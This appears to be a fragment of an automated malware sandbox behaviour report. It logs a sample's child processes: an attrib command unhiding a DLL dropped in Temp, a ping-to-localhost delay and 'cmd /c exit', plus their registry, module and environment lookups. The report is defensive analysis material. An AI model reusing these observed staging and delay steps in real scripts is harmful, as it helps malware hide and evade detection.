| File Name | c:\windows\system32\attrib.exe |
| Command Line | ATTRIB -h -s "C:\Users\BGC6U8~1\AppData\Local\Tempdebug.dll" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:51, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
| Remarks | No high level activity detected in monitored regions |
| Information | Value |
|---|---|
| PID | 0xce0 |
| Parent PID | 0xcc4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
CE4
|
| Information | Value |
|---|---|
| ID | #25 |
| File Name | c:\windows\system32\ping.exe |
| Command Line | Ping 127.0.0.1 -n 3 |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:51, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:24 |
| Information | Value |
|---|---|
| PID | 0xce8 |
| Parent PID | 0xcc4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
CEC
0x
CF0
0x
CF4
0x
CF8
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Write | STD_OUTPUT_HANDLE | size = 20 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 9 |
|
9 | |
| Write | STD_OUTPUT_HANDLE | size = 92 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 97 |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters | value_name = DefaultTTL, data = 0, type = REG_NONE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\ping.exe | base_address = 0xf30000 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
2 | |
| Get Time | type = System Time, time = 2017-10-11 11:01:38 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 84412 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = 127.0.0.1, address_out = 127.0.0.1, service = 0 |
|
1 |
| Information | Value |
|---|---|
| ID | #26 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd.exe /c exit |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:00:53, Reason: Child Process |
| Unmonitor | End Time: 00:02:15, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:22 |
| Information | Value |
|---|---|
| PID | 0xd04 |
| Parent PID | 0xcc4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D08
|
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE |
|
3 | ||
| Open | STD_INPUT_HANDLE |
|
1 |
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System |
|
1 | ||
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor |
|
1 | ||
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor |
|
1 | ||
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49e50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76590000 |
|
2 | |
| Get Filename | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | ||
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x765e24c2 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x765cac6c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x765d3ea8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x765e2732 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2017-10-11 11:01:40 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 86549 |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String |
|
3 | ||
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\BGC6u8Oy yXGxkR\Desktop |
|
1 |
